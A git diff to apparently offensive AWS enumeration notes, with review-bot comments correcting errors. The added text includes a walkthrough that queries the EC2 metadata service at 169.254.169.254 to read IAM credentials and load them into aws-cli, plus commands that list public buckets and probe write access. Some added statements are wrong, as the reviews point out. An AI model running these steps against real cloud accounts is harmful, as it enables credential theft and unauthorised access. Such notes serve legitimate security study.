diff --git a/Enumeration/AWS.md b/Enumeration/AWS.md index 99ae850..c59268e 100644 --- a/Enumeration/AWS.md +++ b/Enumeration/AWS.md @@ -33,7 +33,8 @@ or http://s3.amazonaws.com/BUCKETNAME/FILENAME.ext ``` -* __List content of public bucket via__ +### List content of public bucket via + ```sh aws s3 ls s3:/// --no-sign-request ``` @@ -51,9 +52,10 @@ If the ACL is set to * `Anyone`, just `curl` * `AuthenticatedUsers`, `s3` cli with aws key -## IAM +## Identity Access Management (IAM) -Permissions are granted directly through user accounts or indirectly through +Permissions are granted directly through IAM identities (IAM Principals) inside +an AWS account or indirectly through roles the user has joined. Policy evaluation @@ -75,7 +77,7 @@ and authorization. Every AWS account has a single root account bound to an email address. This account has got the all privileges over the account. A root account has MFA -disabled by default. +disabled by default. Has all permissions except Organizational Service Control Policies. The account is susceptible to an attack if the mail address is accessible but MFA is not activated. @@ -83,11 +85,13 @@ MFA is not activated. If the MFA is not set, it is an opportunity for a password reset attack when the account the vulnerable root belongs to is part of an AWS Organization. -### User Policies +### (User) Policies After authentication of a user (or principal) policies of the account are checked if the request is allowed. Policy evaluation can be found in the [AWS docs](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_policies_evaluation-logic.html). +A policy may also be attached to a resource. + The following graph is taken from the documentation, it shows the evaluation logic inside an account 
@@ -96,6 +100,27 @@ logic inside an account Policies like `assume-role` and `switch-role` can lead to the gain of roles with higher permissions +## AWS Organizations + +An organization is a tree structure, made out of a single root account and +Organizational Units (UOs). UOs can have children UOs. AN UO may contain +multiple AWS accounts. An AWS account can contain multiple user accounts. + +An organization has IAM and SSO that also works with external identity +Providers (idP). This is done through the AWS IAM Identity Center which is used +to confiure roles and permissions. + +Further, there is a management account inside any organization. It owns the +role "OrganizationAccountAccessRole". This account uses the policies/roles +mentioned in the [User Policies](#User-Policies) which are `assume-role` and +`switch-role` on the cli tool and the management web-console to gain +administrative permissions over the UOs inside the organization. + +By default the Service Control Policy (SCP) `p-full-access` it attached to +every account inside the organization. This SCP allows subscription to all AWS +services. An account can have 5 SCPs at max. Limiting SCPs do not apply to the +management account itself. + ### User Provisioning When using the cli command, the aws configuration and credentials are stored at `~/.aws` @@ -136,9 +161,12 @@ In another region aws ec2 describe-instances --output text --region us-east-1 --profile PROFILENAME ``` -### AWS ARN +### Amazon Resource Name (ARN) -Unique ID is create through the following scheme +The [ARN](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference-arns.html) +is a unique ID which identifies resources. + +A Unique ID is create through the following scheme ```sh arn:aws::::/ 
@@ -159,3 +187,72 @@ Do a `PUT` method to see if the bucket may be writeable to upload a file via ```sh curl -vvv -X PUT $BUCKET_URL --data "Test of write permissions" ``` + +## Virtual Private Cloud (VPC) + +Is a logic network segementation method using its own IP address range. +Contains resources like VMs (EC2) and has an Internet gateway if needed. The +gateway can be either just ingress, egress, or both. EC2 can use elastic IP +addresses to provide Ingress. A Gateway Load Balancer can be used to do traffic inspection. + +To connect to a VPC, it does not need to be exposed to the Internet. It is +accessible through various connection services like Direct Connect or +PrivateLink. + +VPCs can have multiple subnets, they use host infrastructure components like +DHCP, NTP and DNS provided by AWS. + +NTP can be found under 169.254.169.123. The DNS resolver `Route 53` can be +found under 169.254.169.253. Microsoft's KMS service can be at 169.254.169.250 +and 169.254.169.251. + +### Metadata Service + +The instance (Openstack) Metadata service can be found under 169.254.169.254. +It can be used +to gain information about the EC2 via a GET request to +http://169.254.169.254/latest/meta-data . + +The task metadata service can be found at 169.254.170.2 and is used for the +Elastic Container Service (ECS). + +The instance metadata service has been used for information disclosure of +security credentials before. +[Alexander +Hose](https://alexanderhose.com/how-to-hack-aws-instances-with-the-metadata-service-enabled/) +describes how to use the credentials through aws-cli. 
+ +```sh +[ec2-user ~] curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ +ec2S3FullAccess +[ec2-user ~] curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ec2S3FullAccess +{ + "Code": "Success", + "LastUpdated": "2022-10-01T15:19:43Z", + "Type": "AWS-HMAC", + "AccessKeyId": "ASIAMFKOAUSJ7EXAMPLE", + "SecretAccessKey": "UeEevJGByhEXAMPLEKEY", + "Token": "TQijaZw==", + "Expiration": "2022-10-01T21:44:45Z" +} +``` + +Use the credentials to configure aws-cli. + +```sh +$ aws configure +AWS Access Key ID [None]: ASIAMFKOAUSJ7EXAMPLE +AWS Secret Access Key [None]: UeEevJGByhEXAMPLEKEYEXAMPLEKEY +Default region name [None]: us-east-2 +Default output format [None]: json +``` + +Add the credentials to the AWS credentials file + +```sh +[default] +aws_access_key_id = ASIAMFKOAUSJ7EXAMPLE +aws_secret_access_key = UeEevJGByhEXAMPLEKEYEXAMPLEKEY +aws_session_token = TQijaZw== +``` +
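Review bot: in hunk `@@ -33,7 +33,8 @@` the new heading `### List content of public bucket via` keeps the dangling "via" from the old bullet, which only made sense as a lead-in to the command; make it a self-contained heading such as `### List content of a public bucket` (the `aws s3 ls ... --no-sign-request` line beneath it already shows the how). Also check that the bucket placeholder survived: as rendered, `aws s3 ls s3:/// --no-sign-request` shows nothing between `s3://` and the trailing `/`, so a reader cannot tell where the bucket name goes.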
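Review bot: in hunk `@@ -51,9 +52,10 @@` the heading drops the "and": the service is "Identity and Access Management (IAM)". The rewritten sentence also misdescribes roles with "roles the user has joined"; a principal does not join a role, it assumes one (`sts:AssumeRole`), which works only when the role's trust policy names that principal and the principal's own policy allows the call. Suggest "or indirectly through roles the principal is allowed to assume".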
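Review bot: in hunk `@@ -75,7 +77,7 @@` the appended "Has all permissions except Organizational Service Control Policies." is a subject-less fragment that repeats the "has got the all privileges" sentence two lines above, and as worded it gets the relationship backwards: SCPs are not a permission the root user lacks, they are the one control that still bounds the root user of a member account, and they never apply to the management account. Suggest folding both sentences into one, e.g. "The root user holds every permission in the account; in a member account of an AWS Organization it is still limited by Service Control Policies, which do not apply to the management account." and fixing "has got the all privileges" while the paragraph is open.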
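Review bot: in hunk `@@ -83,11 +85,13 @@` the heading is renamed to `### (User) Policies`, but the Organizations hunk later in this patch links to it as `[User Policies](#User-Policies)`; Markdown renderers derive the anchor by lowercasing and dropping punctuation, so the slug is `#user-policies` and the mixed-case link should be lowercased and re-checked after the rename. The added line "A policy may also be attached to a resource." would be more useful with the evaluation consequence, since that is what this section is about: a resource-based policy (bucket policy, role trust policy) is evaluated alongside the identity policy and can grant a principal from another account access. Minor: "are checked if the request is allowed" reads better as "are evaluated to decide whether the request is allowed".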
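Review bot: in hunk `@@ -96,6 +100,27 @@` the default SCP is misnamed: AWS calls it `FullAWSAccess` (policy ID `p-FullAWSAccess`), not `p-full-access`. The role placement is also wrong as written: "It owns the role OrganizationAccountAccessRole" puts the role in the management account, but that role is created in each member account (when the account is created through Organizations) with a trust policy naming the management account, which then assumes it with `sts:AssumeRole`; likewise `assume-role` and `switch-role` are not policies, `aws sts assume-role` is an STS API call and "Switch role" is a console action, and the permission involved is `sts:AssumeRole`. Structure: an organization's root is a container for OUs and accounts, not "a single root account", and "multiple user accounts" inside an AWS account should read "multiple IAM users". Typos throughout the hunk: "Organizational Units (UOs)" and "AN UO" should be OUs/OU, "idP" should be IdP, "confiure" should be configure, "it attached" should be "is attached". The "5 SCPs at max" limit is per entity, so say "directly attached to a root, OU or account".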
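Review bot: in hunk `@@ -136,9 +161,12 @@` the added sentence and the kept one say the same thing twice ("is a unique ID which identifies resources" followed by "A Unique ID is create through"); merge them into one and fix the grammar, e.g. "An ARN uniquely identifies a resource and follows the scheme". Also check the scheme line beneath it: as rendered, `arn:aws::::/` shows only separators, so if the field placeholders were stripped they need to be restored (the fields are partition, service, region, account-id and resource).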
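Review bot: in hunk `@@ -159,3 +187,72 @@` the metadata walkthrough silently assumes IMDSv1. On an instance launched with IMDSv2 required, which recent AMIs default to, the bare `curl http://169.254.169.254/latest/meta-data/iam/security-credentials/` returns 401; the reader first needs a token from `PUT /latest/api/token` with an `X-aws-ec2-metadata-token-ttl-seconds` header and must send it as `X-aws-ec2-metadata-token` on the GET, and the default hop limit of 1 additionally stops the token request from inside a container. Say which version the example assumes and show the token step. The credential handling is also inconsistent: the curl output shows `"SecretAccessKey": "UeEevJGByhEXAMPLEKEY"` but both the `aws configure` transcript and the credentials file use `UeEevJGByhEXAMPLEKEYEXAMPLEKEY`, and `aws configure` never prompts for the session token, so after that step alone the CLI will reject these temporary (`ASIA`, `Expiration`) credentials; either drop the `aws configure` step in favour of the credentials-file block or add `aws configure set aws_session_token ...`, and mention that the credentials must be re-fetched after `Expiration`. Wording: "The instance (Openstack) Metadata service" should name the EC2 Instance Metadata Service (IMDS), since this page is about AWS; "Is a logic network segementation method" should read "A VPC is a logical network segmentation method".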